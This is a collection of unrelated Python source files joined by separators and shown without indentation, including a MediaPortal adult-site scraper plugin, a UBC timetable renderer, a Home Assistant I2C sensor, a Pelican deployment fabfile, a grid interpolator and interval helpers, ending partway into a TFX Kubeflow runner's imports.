By default this method calls 'destroy' on the action itself.
"""
self.action.destroy()
return
#### EOF ######################################################################
|
# -*- coding: utf-8 -*-
###############################################################################################
#
# MediaPortal for Dreambox OS
#
# Coded by MediaPortal Team (c) 2013-2015
#
# This plugin is open source but it is NOT free software.
#
# This plugin may only be distributed to and executed on hardware which
# is licensed by Dream Property GmbH. This includes commercial distribution.
# In other words:
# It's NOT allowed to distribute any parts of this plugin or its source code in ANY way
# to hardware which is NOT licensed by Dream Property GmbH.
# It's NOT allowed to execute this plugin and its source code or even parts of it in ANY way
# on hardware which is NOT licensed by Dream Property GmbH.
#
# This applies to the source code as a whole as well as to parts of it, unless
# explicitely stated otherwise.
#
# If you want to use or modify the code or parts of it,
# you have to keep OUR license and inform us about the modifications, but it may NOT be
# commercially distributed other than under the conditions noted above.
#
# As an exception regarding modifcations, you are NOT permitted to remove
# any copy protections implemented in this plugin or change them for means of disabling
# or working around the copy protections, unless the change has been explicitly permitted
# by the original authors. Also decompiling and modification of the closed source
# parts is NOT permitted.
#
# Advertising with this plugin is NOT allowed.
# For other uses, permission from the authors is necessary.
#
###############################################################################################
from Plugins.Extensions.MediaPortal.plugin import _
from Plugins.Extensions.MediaPortal.resources.imports import *
class adultbayGenreScreen(MPScreen):
def __init__(self, session):
self.plugin_path = mp_globals.pluginPath
self.skin_path = mp_globals.pluginPath + mp_globals.skinsPath
path = "%s/%s/defaultGenreScreen.xml" % (self.skin_path, config.mediaportal.skin.value)
if not fileExists(path):
path = self.skin_path + mp_globals.skinFallback + "/defaultGenreScreen.xml"
with open(path, "r") as f:
self.skin = f.read()
f.close()
MPScreen.__init__(self, session)
self["actions"] = ActionMap(["MP_Actions"], {
"ok" : self.keyOK,
"0" : self.closeAll,
"cancel": self.keyCancel
}, -1)
self['title'] = Label("The Adult Bay")
self['ContentTitle'] = Label("Genre:")
self.keyLocked = True
self.suchString = ''
self.filmliste = []
self.ml = MenuList([], enableWrapAround=True, content=eListboxPythonMultiContent)
self['liste'] = self.ml
self.onLayoutFinish.append(self.genreData)
def genreData(self):
self.filmliste.append(("--- Search ---", None))
self.filmliste.append(("Newest (Clips)", "http://adultbay.org/category/clips/"))
self.filmliste.append(("Newest (Movies)", "http://adultbay.org/category/movies/"))
self.filmliste.append(("Clips", None))
self.filmliste.append(("Movies", None))
self.filmliste.append(("HDTV", None))
self.filmliste.append(("DVD-R", "http://adultbay.org/category/dvd-r/"))
self.filmliste.append(("Hentai", "http://adultbay.org/category/hentai/"))
self.ml.setList(map(self._defaultlistcenter, self.filmliste))
self.keyLocked = False
def SuchenCallback(self, callback = None, entry = None):
if callback is not None and len(callback):
self.suchString = callback.replace(' ', '+')
Link = self.suchString
Name = "--- Search ---"
self.session.open(adultbayListScreen, Link, Name)
def keyOK(self):
if self.keyLocked:
return
if not config.mediaportal.premiumize_use.value:
message = self.session.open(MessageBoxExt, _("The Adult Bay only works with enabled MP premiumize.me option (MP Setup)!"), MessageBoxExt.TYPE_INFO, timeout=10)
return
Name = self['liste'].getCurrent()[0][0]
Link = self['liste'].getCurrent()[0][1]
if Name == "--- Search ---":
self.suchen()
elif Link != None:
self.session.open(adultbayListScreen, Link, Name)
else:
self.session.open(adultbaySubGenreScreen, Name)
class adultbaySubGenreScreen(MPScreen):
def __init__(self, session, Name):
self.Name = Name
self.plugin_path = mp_globals.pluginPath
self.skin_path = mp_globals.pluginPath + mp_globals.skinsPath
path = "%s/%s/defaultGenreScreen.xml" % (self.skin_path, config.mediaportal.skin.value)
if not fileExists(path):
path = self.skin_path + mp_globals.skinFallback + "/defaultGenreScreen.xml"
with open(path, "r") as f:
self.skin = f.read()
f.close()
MPScreen.__init__(self, session)
self["actions"] = ActionMap(["MP_Actions"], {
"ok" : self.keyOK,
"0" : self.closeAll,
"cancel": self.keyCancel
}, -1)
self['title'] = Label("The Adult Bay")
self['ContentTitle'] = Label("Genre:")
self.keyLocked = True
self.filmliste = []
self.ml = MenuList([], enableWrapAround=True, content=eListboxPythonMultiContent)
self['liste'] = self.ml
self.onLayoutFinish.append(self.loadPage)
def loadPage(self):
url = "http://adultbay.org/"
getPage(url, headers={'Content-Type':'application/x-www-form-urlencoded'}).addCallback(self.parseData).addErrback(self.dataError)
def parseData(self, data):
parse = re.search('class="cat-item.*?>'+self.Name+'</a>(.*?)</ul>', data, re.S)
raw = re.findall('<li\sclass="cat-item.*?a\shref="(.*?)".*?>(.*?)</a>', parse.group(1), re.S)
if raw:
self.filmliste = []
for (Url, Title) in raw:
self.filmliste.append((decodeHtml(Title), Url))
self.filmliste.sort()
self.ml.setList(map(self._defaultlistcenter, self.filmliste))
self.keyLocked = False
def keyOK(self):
if self.keyLocked:
return
Name = self['liste'].getCurrent()[0][0]
Link = self['liste'].getCurrent()[0][1]
self.session.open(adultbayListScreen, Link, Name)
class adultbayListScreen(MPScreen, ThumbsHelper):
def __init__(self, session, Link, Name):
self.Link = Link
self.Name = Name
self.plugin_path = mp_globals.pluginPath
self.skin_path = mp_globals.pluginPath + mp_globals.skinsPath
path = "%s/%s/defaultListWideScreen.xml" % (self.skin_path, config.mediaportal.skin.value)
if not fileExists(path):
path = self.skin_path + mp_globals.skinFallback + "/defaultListWideScreen.xml"
with open(path, "r") as f:
self.skin = f.read()
f.close()
MPScreen.__init__(self, session)
ThumbsHelper.__init__(self)
self["actions"] = ActionMap(["MP_Actions"], {
"ok" : self.keyOK,
"0" : self.closeAll,
"cancel": self.keyCancel,
"5" : self.keyShowThumb,
"up" : self.keyUp,
"down" : self.keyDown,
"right" : self.keyRight,
"left" : self.keyLeft,
"nextBouquet" : self.keyPageUp,
"prevBouquet" : self.keyPageDown,
"green" : self.keyPageNumber
}, -1)
self['title'] = Label("The Adult Bay")
self['ContentTitle'] = Label("Genre: %s" % self.Name)
self['F2'] = Label(_("Page"))
self['Page'] = Label(_("Page:"))
self.keyLocked = True
self.ml = MenuList([], enableWrapAround=True, content=eListboxPythonMultiContent)
self['liste'] = self.ml
self.page = 1
self.onLayoutFinish.append(self.loadPage)
def loadPage(self):
self.keyLocked = True
self.filmliste = []
if re.match(".*?Search", self.Name):
url = "http://adultbay.org/search/%s/page/%s/" % (self.Link, str(self.page))
else:
if self.page == 1:
url = self.Link
else:
url = self.Link + "page/" + str(self.page) + "/"
getPage(url, headers={'Content-Type':'application/x-www-form-urlencoded'}).addCallback(self.parseData).addErrback(self.dataError)
def parseData(self, data):
if re.match('.*?<h2>Not Found</h2>', data, re.S):
self.filmliste.append((_('No movies found!'), None, None, None))
self.ml.setList(map(self._defaultlistleft, self.filmliste))
elif re.match('.*?<h2>Sorry: No Results</h2>', data, re.S):
self.filmliste.append((_('No movies found!'), None, None, None))
self.ml.setList(map(self._defaultlistleft, self.filmliste))
elif re.match('.*?Search is temporarily disabled', data, re.S):
self.filmliste.append(("Search is temporarily disabled...", None, None, None))
self.ml.setList(map(self._defaultlistleft, self.filmliste))
else:
parse = re.search('class="wp-pagenavi">(.*?)</div>', data, re.S)
if parse:
lastpage = re.findall('\d{0,1},{0,1}\d+', parse.group(1), re.S)
lastpage = [x.replace(',', '') for x in lastpage]
lastpage = [int(x) for x in lastpage]
lastpage.sort(key=int)
self.lastpage = int(lastpage[-1])
self['page'].setText("%s / %s" % (str(self.page), str(self.lastpage)))
else:
parse = re.search('class="navigation">.*?/page/(.*?)/.*?Older Entries', data, re.S)
if parse:
self.lastpage = int(parse.group(1))
else:
self.lastpage = 1
self['page'].setText("%s / %s" % (str(self.page), str(self.lastpage)))
raw = re.findall('class="post".*?<a\shref="(.*?)".*?img\ssrc="(.*?)".*?(<strong>|<p>)(.*?)(</strong>|<br\s/>|</p>).*?<p>(.*?)(Read\smore|\(more...\))', data, re.S)
if raw:
for (link, image, trash, title, trash, desc, trash) in raw:
title = stripAllTags(title).strip()
desc = stripAllTags(desc).strip()
self.filmliste.append((decodeHtml(title), link, image, desc))
self.ml.setList(map(self._defaultlistleft, self.filmliste))
self.ml.moveToIndex(0)
self.keyLocked = False
self.th_ThumbsQuery(self.filmliste, 0, 1, 2, None, None, self.page, self.lastpage, mode=1)
self.showInfos()
def showInfos(self):
title = self['liste'].getCurrent()[0][0]
self['name'].setText(title)
desc = self['liste'].getCurrent()[0][3]
self['handlung'].setText(desc)
coverUrl = self['liste'].getCurrent()[0][2]
CoverHelper(self['coverArt']).getCover(coverUrl)
def keyOK(self):
if self.keyLocked:
return
Link = self['liste'].getCurrent()[0][0]
if Link == None:
return
Title = self['liste'].getCurrent()[0][1]
Cover = self['liste'].getCurrent()[0][2]
self.session.open(StreamAuswahl, Link, Title, Cover)
class StreamAuswahl(MPScreen):
def __init__(self, session, Title, Link, Cover):
self.Link = Link
self.Title = Title
self.Cover = Cover
self.plugin_path = mp_globals.pluginPath
self.skin_path = mp_globals.pluginPath + mp_globals.skinsPath
path = "%s/%s/defaultListWideScreen.xml" % (self.skin_path, config.mediaportal.skin.value)
if not fileExists(path):
path = self.skin_path + mp_globals.skinFallback + "/defaultListWideScreen.xml"
with open(path, "r") as f:
self.skin = f.read()
f.close()
MPScreen.__init__(self, session)
self["actions"] = ActionMap(["MP_Actions"], {
"ok" : self.keyOK,
"0" : self.closeAll,
"cancel": self.keyCancel
}, -1)
self['title'] = Label("The Adult Bay")
self['ContentTitle'] = Label("%s" %self.Title)
self.filmliste = []
self.keyLocked = True
self.ml = MenuList([], enableWrapAround=True, content=eListboxPythonMultiContent)
self['liste'] = self.ml
self.onLayoutFinish.append(self.loadPage)
def loadPage(self):
CoverHelper(self['coverArt']).getCover(self.Cover)
self.keyLocked = True
url = self.Link
getPage(url, headers={'Content-Type':'application/x-www-form-urlencoded'}).addCallback(self.loadPageData).addErrback(self.dataError)
def loadPageData(self, data):
parse = re.search('class="post_header">(.*?)Recommends:</h2>', data, re.S)
streams = re.findall('(http://(?!adultbay.org)(.*?)\/.*?)[\'|"|\&|<]', parse.group(1), re.S)
if streams:
for (stream, hostername) in streams:
if isSupportedHoster(hostername, True):
hostername = hostername.replace('www.','')
self.filmliste.append((hostername, stream))
# remove duplicates
self.filmliste = list(set(self.filmliste))
if len(self.filmliste) == 0:
self.filmliste.append((_('No supported streams found!'), None))
self.ml.setList(map(self._defaultlisthoster, self.filmliste))
self.keyLocked = False
def keyOK(self):
if self.keyLocked:
return
url = self['liste'].getCurrent()[0][1]
if url == None:
return
get_stream_link(self.session).check_link(url, self.got_link)
def got_link(self, stream_url):
if stream_url == None:
message = self.session.open(MessageBoxExt, _("Stream not found, try another Stream Hoster."), MessageBoxExt.TYPE_INFO, timeout=3)
else:
title = self.Title
self.session.open(SimplePlayer, [(self.Title, stream_url, self.Cover)], showPlaylist=False, ltype='adultbay', cover=True)
|
import tempfile
import os
from uuid import uuid4
from prettytable import PrettyTable
from timetabler.util import iter_time, DAY_LIST
class Schedule(object):
def __init__(self, sched):
"""Schedule
e.g. for ``sched``:
((Lab<status='Restricted', section='EECE 381 L2A', term='2', days='[u'Tue', u'Thu']', start_time='16:00', end_time='19:00'>,
Lecture<status='Restricted', section='EECE 381 201', term='2', days='[u'Mon']', start_time='9:00', end_time='11:00'>),
(Lab<status='Restricted', section='EECE 353 L2C', term='2', days='[u'Thu']', start_time='14:00', end_time='16:00'>,
Lecture<status='', section='EECE 353 201', term='2', days='[u'Tue', u'Thu']', start_time='14:00', end_time='15:30'>),
(Lecture<status='', section='CPSC 304 201', term='2', days='[u'Tue', u'Thu']', start_time='11:00', end_time='12:30'>,
Tutorial<status='', section='CPSC 304 T2A', term='2', days='[u'Fri']', start_time='14:00', end_time='15:00'>))
"""
self._sched = sched
self.activities = [act for crs in sched for act in crs]
def activities_for_day(self, day):
return [a for a in self.activities if day in a.days]
def activity_at_time(self, time="09:00", day="Mon", term=1):
res = [a for a in self.activities if all([
a.start_time <= time,
a.end_time > time,
day in a.days,
term == a.term
])]
assert len(res) in [0, 1], ("More than one activity found at specified time. "
"This likely means the code is wrong.")
if res:
return res[0]
else:
return None
def _draw(self, term=1):
t = PrettyTable(["Time"] + DAY_LIST)
earliest_start_time = min(a.start_time for a in self.activities)
latest_end_time = max(a.end_time for a in self.activities)
time_iter = iter_time(earliest_start_time, latest_end_time)
for time in time_iter:
t.add_row([time] + [getattr(self.activity_at_time(time, day, term), 'section', "") for day in DAY_LIST])
return t
def _create_table_div(self, table):
return "\n{}\n{}\n{}\n".format(
'<div class="CSSTableGenerator">',
table.get_html_string(),
'</div>'
)
def draw(self, terms=(1,), draw_location="browser", title_format="code"):
"""Draw schedule
:type terms: tuple or list
:param term: Terms for which you would like to draw the schedule
:param draw_location: "browser"|"terminal"
:param title_format: "title"|"code"
:returns: List of tables
:rtype: list
"""
assert draw_location in ["browser", "terminal"]
tables = {term: self._draw(term) for term in terms}
if draw_location=="browser":
tempdir = tempfile.gettempdir()
tempfile_loc = os.path.join(tempdir, "ubc-timetabler_{}.html".format(uuid4().hex))
with open(tempfile_loc, 'w+') as f:
html = "{}{}{}".format(
"""<html>
<head>
<!-- Bring to you by http://www.CSSTableGenerator.com -->
<link rel="stylesheet" \
href="https://raw.githubusercontent.com/hfaran/ubc-timetabler/master/css/table.css" \
type="text/css"/>
</head>
<body>
""",
"</br></br></br>\n".join(map(self._create_table_div, tables.itervalues())),
"""
</body>
</html>"""
)
f.write(html)
import webbrowser
webbrowser.open('file://' + os.path.realpath(tempfile_loc))
elif draw_location=="terminal":
for term, table in tables.iteritems():
title_formatters = {
"title": lambda act: act.course.title,
"code": lambda act: "{} {}".format(act.course.dept, act.course.number)
}
print("Courses for Term {}: {}".format(
term,
", ".join({title_formatters[title_format](act)
for act in self.activities if act.term == term})
))
print(table)
return tables
|
"""Support for binary sensor using I2C MCP23017 chip."""
import logging
from adafruit_mcp230xx.mcp23017 import MCP23017 # pylint: disable=import-error
import board # pylint: disable=import-error
import busio # pylint: disable=import-error
import digitalio # pylint: disable=import-error
import voluptuous as vol
from homeassistant.components.binary_sensor import PLATFORM_SCHEMA, BinarySensorDevice
from homeassistant.const import DEVICE_DEFAULT_NAME
import homeassistant.helpers.config_validation as cv
_LOGGER = logging.getLogger(__name__)
CONF_INVERT_LOGIC = "invert_logic"
CONF_I2C_ADDRESS = "i2c_address"
CONF_PINS = "pins"
CONF_PULL_MODE = "pull_mode"
MODE_UP = "UP"
MODE_DOWN = "DOWN"
DEFAULT_INVERT_LOGIC = False
DEFAULT_I2C_ADDRESS = 0x20
DEFAULT_PULL_MODE = MODE_UP
_SENSORS_SCHEMA = vol.Schema({cv.positive_int: cv.string})
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend(
{
vol.Required(CONF_PINS): _SENSORS_SCHEMA,
vol.Optional(CONF_INVERT_LOGIC, default=DEFAULT_INVERT_LOGIC): cv.boolean,
vol.Optional(CONF_PULL_MODE, default=DEFAULT_PULL_MODE): vol.All(
vol.Upper, vol.In([MODE_UP, MODE_DOWN])
),
vol.Optional(CONF_I2C_ADDRESS, default=DEFAULT_I2C_ADDRESS): vol.Coerce(int),
}
)
def setup_platform(hass, config, add_devices, discovery_info=None):
"""Set up the MCP23017 binary sensors."""
pull_mode = config[CONF_PULL_MODE]
invert_logic = config[CONF_INVERT_LOGIC]
i2c_address = config[CONF_I2C_ADDRESS]
i2c = busio.I2C(board.SCL, board.SDA)
mcp = MCP23017(i2c, address=i2c_address)
binary_sensors = []
pins = config[CONF_PINS]
for pin_num, pin_name in pins.items():
pin = mcp.get_pin(pin_num)
binary_sensors.append(
MCP23017BinarySensor(pin_name, pin, pull_mode, invert_logic)
)
add_devices(binary_sensors, True)
class MCP23017BinarySensor(BinarySensorDevice):
"""Represent a binary sensor that uses MCP23017."""
def __init__(self, name, pin, pull_mode, invert_logic):
"""Initialize the MCP23017 binary sensor."""
self._name = name or DEVICE_DEFAULT_NAME
self._pin = pin
self._pull_mode = pull_mode
self._invert_logic = invert_logic
self._state = None
self._pin.direction = digitalio.Direction.INPUT
self._pin.pull = digitalio.Pull.UP
@property
def name(self):
"""Return the name of the sensor."""
return self._name
@property
def is_on(self):
"""Return the state of the entity."""
return self._state != self._invert_logic
def update(self):
"""Update the GPIO state."""
self._state = self._pin.value
|
""""
usage-
./manage.py builddata load_knowledgebase_csv ~/Documents/Scratch/knowledgebase.csv
Creates derived dataset of constants used by JS frontend. Data is sourced from cla_common.
you can then load the fixture with-
./manage.py loaddata cla_backend/apps/knowledgebase/fixtures/kb_from_spreadsheet.json
"""
from django.core.management.base import BaseCommand
import os
import sys
from ._csv_2_fixture import KnowledgebaseCsvParse
class Command(BaseCommand):
args = "load_knowledgebase_csv CSV_FILE.csv"
help = (
"Create a derived dataset. At present, just load_knowledgebase_csv "
"is implemented. It loads a CSV spreadsheet into a fixture ready "
"to be loaddata'ed into DB"
)
KNOWLEDGEBASE_FIXTURE = "cla_backend/apps/knowledgebase/fixtures/kb_from_spreadsheet.json"
def handle(self, *args, **options):
if args[0] == "load_knowledgebase_csv":
if len(args) != 2:
self.stdout.write("Last argument needs to be path to CSV file")
sys.exit(-1)
if not os.access(args[1], os.R_OK):
self.stdout.write("File '%s' couldn't be read" % args[1])
sys.exit(-1)
# read in CSV and feed to fixture builder
f_in = open(args[1], "rU")
c = KnowledgebaseCsvParse(f_in)
json = c.fixture_as_json()
f_in.close()
# write json doc to fixture file
f_out = open(self.KNOWLEDGEBASE_FIXTURE, "w")
f_out.write(json)
f_out.close()
self.stdout.write("Fixture written to %s" % self.KNOWLEDGEBASE_FIXTURE)
|
#!/usr/bin/env python
import sys
import os
import time
import random
import alsaaudio
import pyttsx
from subprocess import call
#
# Our sound coordinator
#
class SoundManager ():
SOUND_PLAYER = 'mpg123'
SOUNDS_DIR = os.path.dirname(__file__) + '/sounds'
SOUND_FILE_EXT = 'mp3'
sound_list = []
next_in_queue = []
def __init__(self):
self.requires(self.SOUND_PLAYER)
self.mixer = alsaaudio.Mixer('PCM')
self.speech_engine = pyttsx.init()
ext = ".%s" % self.SOUND_FILE_EXT
for dirpath, dirnames, filenames in os.walk(self.SOUNDS_DIR):
for filename in filenames:
if filename.endswith(ext):
full_path = os.path.join(dirpath, filename)
self.sound_list.append(full_path)
@staticmethod
def requires(utility):
devnull = open(os.devnull, 'w')
if call(['which', utility], stdout=devnull, stderr=devnull) != 0:
print "Sound manager requires '%s' utility" % utility
devnull.close()
sys.exit(1)
else:
devnull.close()
def play(self, filepath):
devnull = open(os.devnull, 'w')
ret = call([self.SOUND_PLAYER, filepath], stdout=devnull, stderr=devnull)
devnull.close()
return ret == 0
def play_random(self):
l = len(self.sound_list)
if l > 0:
return self.play(self.sound_list[random.randint(0,l-1)])
else:
return False
def play_next(self):
if len(self.next_in_queue) <= 0:
l = len(self.sound_list)
if l > 0:
self.next_in_queue = range(0,l)
random.shuffle(self.next_in_queue)
else:
return False
sound_position_id = self.next_in_queue.pop()
return self.play(self.sound_list[sound_position_id])
def say(self, text):
self.speech_engine.say(text)
self.speech_engine.runAndWait()
def mute(self):
self.mixer.setmute(1)
def unmute(self):
self.mixer.setmute(0)
|
from fabric.api import *
import fabric.contrib.project as project
import os
import shutil
import sys
import SocketServer
from pelican.server import ComplexHTTPRequestHandler
# Local path configuration (can be absolute or relative to fabfile)
env.deploy_path = 'output'
DEPLOY_PATH = env.deploy_path
# Remote server configuration
production = 'root@localhost:22'
dest_path = 'n'
# Rackspace Cloud Files configuration settings
env.cloudfiles_username = 'my_rackspace_username'
env.cloudfiles_api_key = 'my_rackspace_api_key'
env.cloudfiles_container = 'my_cloudfiles_container'
# Github Pages configuration
env.github_pages_branch = "gh-pages"
# Port for `serve`
PORT = 8000
def clean():
"""Remove generated files"""
if os.path.isdir(DEPLOY_PATH):
shutil.rmtree(DEPLOY_PATH)
os.makedirs(DEPLOY_PATH)
def build():
"""Build local version of site"""
local('pelican -s pelicanconf.py')
def rebuild():
"""`clean` then `build`"""
clean()
build()
def regenerate():
"""Automatically regenerate site upon file modification"""
local('pelican -r -s pelicanconf.py')
def serve():
"""Serve site at http://localhost:8000/"""
os.chdir(env.deploy_path)
class AddressReuseTCPServer(SocketServer.TCPServer):
allow_reuse_address = True
server = AddressReuseTCPServer(('', PORT), ComplexHTTPRequestHandler)
sys.stderr.write('Serving on port {0} ...\n'.format(PORT))
server.serve_forever()
def reserve():
"""`build`, then `serve`"""
build()
serve()
def preview():
"""Build production version of site"""
local('pelican -s publishconf.py')
def cf_upload():
"""Publish to Rackspace Cloud Files"""
rebuild()
with lcd(DEPLOY_PATH):
local('swift -v -A https://auth.api.rackspacecloud.com/v1.0 '
'-U {cloudfiles_username} '
'-K {cloudfiles_api_key} '
'upload -c {cloudfiles_container} .'.format(**env))
@hosts(production)
def publish():
"""Publish to production via rsync"""
local('pelican -s publishconf.py')
project.rsync_project(
remote_dir=dest_path,
exclude=".DS_Store",
local_dir=DEPLOY_PATH.rstrip('/') + '/',
delete=True,
extra_opts='-c',
)
def gh_pages():
"""Publish to GitHub Pages"""
rebuild()
local("ghp-import -b {github_pages_branch} {deploy_path}".format(**env))
local("git push origin {github_pages_branch}".format(**env))
|
""" interpolate data given on an Nd rectangular grid, uniform or non-uniform.
Purpose: extend the fast N-dimensional interpolator
`scipy.ndimage.map_coordinates` to non-uniform grids, using `np.interp`.
Background: please look at
http://en.wikipedia.org/wiki/Bilinear_interpolation
http://stackoverflow.com/questions/6238250/multivariate-spline-interpolation-in-python-scipy
http://docs.scipy.org/doc/scipy-dev/reference/generated/scipy.ndimage.interpolation.map_coordinates.html
Example
-------
Say we have rainfall on a 4 x 5 grid of rectangles, lat 52 .. 55 x lon -10 .. -6,
and want to interpolate (estimate) rainfall at 1000 query points
in between the grid points.
# define the grid --
griddata = np.loadtxt(...) # griddata.shape == (4, 5)
lo = np.array([ 52, -10 ]) # lowest lat, lowest lon
hi = np.array([ 55, -6 ]) # highest lat, highest lon
# set up an interpolator function "interfunc()" with class Intergrid --
interfunc = Intergrid( griddata, lo=lo, hi=hi )
# generate 1000 random query points, lo <= [lat, lon] <= hi --
query_points = lo + np.random.uniform( size=(1000, 2) ) * (hi - lo)
# get rainfall at the 1000 query points --
query_values = interfunc( query_points ) # -> 1000 values
What this does:
for each [lat, lon] in query_points:
1) find the square of griddata it's in,
e.g. [52.5, -8.1] -> [0, 3] [0, 4] [1, 4] [1, 3]
2) do bilinear (multilinear) interpolation in that square,
using `scipy.ndimage.map_coordinates` .
Check:
interfunc( lo ) -> griddata[0, 0],
interfunc( hi ) -> griddata[-1, -1] i.e. griddata[3, 4]
Parameters
----------
griddata: numpy array_like, 2d 3d 4d ...
lo, hi: user coordinates of the corners of griddata, 1d array-like, lo < hi
maps: a list of `dim` descriptors of piecewise-linear or nonlinear maps,
e.g. [[50, 52, 62, 63], None] # uniformize lat, linear lon
copy: make a copy of query_points, default True;
copy=False overwrites query_points, runs in less memory
verbose: default 1: print a 1-line summary for each call, with run time
order=1: see `map_coordinates`
prefilter: 0 or False, the default: smoothing B-spline
1 or True: exact-fit interpolating spline (IIR, not C-R)
1/3: Mitchell-Netravali spline, 1/3 B + 2/3 fit
(prefilter is only for order > 1, since order = 1 interpolates)
Non-uniform rectangular grids
-----------------------------
What if our griddata above is at non-uniformly-spaced latitudes,
say [50, 52, 62, 63] ? `Intergrid` can "uniformize" these
before interpolation, like this:
lo = np.array([ 50, -10 ])
hi = np.array([ 63, -6 ])
maps = [[50, 52, 62, 63], None] # uniformize lat, linear lon
interfunc = Intergrid( griddata, lo=lo, hi=hi, maps=maps )
This will map (transform, stretch, warp) the lats in query_points column 0
to array coordinates in the range 0 .. 3, using `np.interp` to do
piecewise-linear (PWL) mapping:
50 51 52 53 54 55 56 57 58 59 60 61 62 63 # lo[0] .. hi[0]
0 .5 1 1.1 1.2 1.3 1.4 1.5 1.6 1.7 1.8 1.9 2 3
`maps[1] None` says to map the lons in query_points column 1 linearly:
-10 -9 -8 -7 -6 # lo[1] .. hi[1]
0 1 2 3 4
More doc: https://denis-bz.github.com/docs/intergrid.html
"""
# split class Gridmap ?
from __future__ import division
from time import time
# warnings
import numpy as np
from scipy.ndimage import map_coordinates, spline_filter
__version__ = "2014-05-09 leif denby" # 9may: fix bug default argument bug
__author_email__ = "denis-bz-py@t-online.de" # comments welcome, testcases most welcome
#...............................................................................
class Intergrid:
__doc__ = globals()["__doc__"]
def __init__( self, griddata, lo, hi, maps=None, copy=True, verbose=1,
order=1, prefilter=False ):
griddata = np.asanyarray( griddata )
dim = griddata.ndim # - (griddata.shape[-1] == 1) # ??
assert dim >= 2, griddata.shape
self.dim = dim
if np.isscalar(lo):
lo *= np.ones(dim)
if np.isscalar(hi):
hi *= np.ones(dim)
self.loclip = lo = np.asarray_chkfinite( lo ).copy()
self.hiclip = hi = np.asarray_chkfinite( hi ).copy()
assert lo.shape == (dim,), lo.shape
assert hi.shape == (dim,), hi.shape
self.copy = copy
self.verbose = verbose
self.order = order
if order > 1 and 0 < prefilter < 1: # 1/3: Mitchell-Netravali = 1/3 B + 2/3 fit
exactfit = spline_filter( griddata ) # see Unser
griddata += prefilter * (exactfit - griddata)
prefilter = False
self.griddata = griddata
self.prefilter = (prefilter == True)
if maps is None:
maps = [None,] * len(lo)
self.maps = maps
self.nmap = 0
if len(maps) > 0:
assert len(maps) == dim, "maps must have len %d, not %d" % (
dim, len(maps))
# linear maps (map None): Xcol -= lo *= scale -> [0, n-1]
# nonlinear: np.interp e.g. [50 52 62 63] -> [0 1 2 3]
self._lo = np.zeros(dim)
self._scale = np.ones(dim)
for j, (map, n, l, h) in enumerate( zip( maps, griddata.shape, lo, hi )):
## print "test: j map n l h:", j, map, n, l, h
if map is None or callable(map):
self._lo[j] = l
if h > l:
self._scale[j] = (n - 1) / (h - l) # _map lo -> 0, hi -> n - 1
else:
self._scale[j] = 0 # h <= l: X[:,j] -> 0
continue
self.maps[j] = map = np.asanyarray(map)
self.nmap += 1
assert len(map) == n, "maps[%d] must have len %d, not %d" % (
j, n, len(map) )
mlo, mhi = map.min(), map.max()
if not (l <= mlo <= mhi <= h):
print ("Warning: Intergrid maps[%d] min %.3g max %.3g " \
"are outside lo %.3g hi %.3g" % (
j, mlo, mhi, l, h ))
#...............................................................................
def _map_to_uniform_grid( self, X ):
""" clip, map X linear / nonlinear inplace """
np.clip( X, self.loclip, self.hiclip, out=X )
# X nonlinear maps inplace --
for j, map in enumerate(self.maps):
if map is None:
continue
if callable(map):
X[:,j] = map( X[:,j] ) # clip again ?
else:
# PWL e.g. [50 52 62 63] -> [0 1 2 3] --
X[:,j] = np.interp( X[:,j], map, np.arange(len(map)) )
# linear map the rest, inplace (nonlinear _lo 0, _scale 1: noop)
if self.nmap < self.dim:
X -= self._lo
X *= self._scale # (griddata.shape - 1) / (hi - lo)
## print "test: _map_to_uniform_grid", X.T
#...............................................................................
def __call__( self, X, out=None ):
""" query_values = Intergrid(...) ( query_points npt x dim )
"""
X = np.asanyarray(X)
assert X.shape[-1] == self.dim, ("the query array must have %d columns, "
"but its shape is %s" % (self.dim, X.shape) )
Xdim = X.ndim
if Xdim == 1:
X = np.asarray([X]) # in a single point -> out scalar
if self.copy:
X = X.copy()
assert X.ndim == 2, X.shape
npt = X.shape[0]
if out is None:
out = np.empty( npt, dtype=self.griddata.dtype )
t0 = time()
self._map_to_uniform_grid( X ) # X inplace
#...............................................................................
map_coordinates( self.griddata, X.T,
order=self.order, prefilter=self.prefilter,
mode="nearest", # outside -> edge
# test: mode="constant", cval=np.NaN,
output=out )
if self.verbose:
print ("Intergrid: %.3g msec %d points in a %s grid %d maps order %d" % (
(time() - t0) * 1000, npt, self.griddata.shape, self.nmap, self.order ))
return out if Xdim == 2 else out[0]
at = __call__
# end intergrid.py
|
from typing import List, Tuple
"""
Module for Location & Interval manipulation
"""
def intervals_from_locations(locations: List[float]) -> List[float]:
intervals = []
previous_location = None
for index, location in enumerate(locations):
if index == 0:
intervals.append(location)
else:
intervals.append(location - previous_location)
previous_location = location
return intervals
def locations_from_intervals(intervals: List[float]) -> List[float]:
locations = []
running_duration = 0
for index, interval in enumerate(intervals):
if index < len(intervals):
running_duration += interval
locations.append(running_duration)
return locations
def start_end_locations_from_locations(locations: List[float]) -> Tuple[List[float], List[float]]:
"""
Calculates the start and end times of each location
Ex) 5, 10, 15
start_times == 5, 10, 15
end_times == 10, 15, 15
Returns
-------
A tuple of start and end times
"""
start_locations = []
end_locations = []
for index, location in enumerate(locations):
start_time = location
if index == len(locations) - 1:
end_time = location
else:
end_time = locations[index + 1]
start_locations.append(start_time)
end_locations.append(end_time)
return start_locations, end_locations
def start_end_locations_from_intervals(intervals: List[float]) -> Tuple[List[float], List[float]]:
"""
Calculates the start and end times of each interval
Ex) 5, 10, 15
start_times == 0, 5, 10
end_times == 5, 10, 15
Returns
-------
A tuple of start and end times
"""
start_locations = []
end_locations = []
running_duration = 0
for index, duration in enumerate(intervals):
start_time = running_duration
end_time = start_time + duration
start_locations.append(start_time)
end_locations.append(end_time)
running_duration += duration
return start_locations, end_locations
|
# Lint as: python2, python3
# Copyright 2019 Google LLC. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""TFX runner for Kubeflow."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
from typing import Callable, Dict, List, Optional, Text, Type, cast
from absl import logging
from kfp import compiler
from kfp import dsl
from kfp import gcp
from kubernetes import client as k8s_client
from tfx import version
from tfx.dsl.compiler import compiler as tfx_compiler
